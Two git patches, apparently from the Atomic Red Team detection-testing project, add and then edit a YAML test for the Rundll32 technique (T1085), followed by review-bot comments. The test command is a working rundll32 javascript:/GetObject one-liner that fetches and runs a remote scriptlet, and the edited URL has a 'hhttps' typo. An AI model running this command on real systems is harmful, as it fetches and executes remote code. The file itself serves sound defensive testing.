From ba333046de54eccf70a2ba41e7a6f2ee7daf2146 Mon Sep 17 00:00:00 2001
From: Brian Beyer
Date: Sat, 12 May 2018 23:09:43 +0200
Subject: [PATCH 1/2] add t1085 from yamlize branch
---
atomics/t1085/t1085.yaml | 17 +++++++++++++++++
1 file changed, 17 insertions(+)
create mode 100644 atomics/t1085/t1085.yaml
diff --git a/atomics/t1085/t1085.yaml b/atomics/t1085/t1085.yaml
new file mode 100644
index 00000000..b1628ac6
--- /dev/null
+++ b/atomics/t1085/t1085.yaml
@@ -0,0 +1,17 @@
+attack_technique: T1085
+display_name: Rundll32
+atomic_tests:
+- name: Rundll32 execute JavaScript Remote Payload With GetObject
+ description: |
+ Test execution of a remote script using rundll32.exe
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_url:
+ description: location of the payload
+ type: Url
+ default: https://www.example.com/1085.sct
+ executor:
+ name: command_prompt
+ command: |
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"
From 5ec7fc065a9ff80797582212e8b3a9b7ea68879b Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Wed, 23 May 2018 16:34:25 -0600
Subject: [PATCH 2/2] fixed path
---
atomics/t1085/t1085.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/t1085/t1085.yaml b/atomics/t1085/t1085.yaml
index b1628ac6..b7546064 100644
--- a/atomics/t1085/t1085.yaml
+++ b/atomics/t1085/t1085.yaml
@@ -10,7 +10,7 @@ atomic_tests:
 file_url:
 description: location of the payload
 type: Url
- default: https://www.example.com/1085.sct
+ default: hhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
 executor:
 name: command_prompt
 command: |
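Review bot: Both block scalars in the new file use `|`, so `description` and `command` each carry a trailing newline; `|-` yields the same text without it, which matters most for `command` because the whole value is a single rundll32 command line — suggest `description: |-` and `command: |-`. The description is also thinner than the command it documents: it should state that the test launches rundll32.exe with a `javascript:` argument that loads mshtml's RunHTMLApplication and then retrieves the scriptlet at `#{file_url}` over the network with GetObject, and that the signal a detection engineer should presumably look for is a rundll32.exe process whose recorded command line contains those strings; I would replace the one-line description with two or three sentences to that effect. `type: Url` and the unquoted default URL parse fine as YAML, since the `:` in the URL is not followed by a space.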
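Review bot: The new default on the `+` line reads `hhttps://raw.githubusercontent.com/...` — the doubled `h` makes the scheme invalid, so GetObject would fail to retrieve the scriptlet and the test cannot run with its default as committed; the line should be `default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct`. The URL also references the mutable `master` branch, so what the test executes at run time can change without this file changing; pinning the ref, e.g. `.../atomic-red-team/<COMMIT_SHA>/atomics/T1085/T1085.sct` with a real commit id, would make the test reproducible and keep the fetched content under review. The path segment is `T1085` while this file lives under `atomics/t1085/`; GitHub paths are case-sensitive, so verify the case matches where the .sct is actually committed — that file is not visible from this hunk.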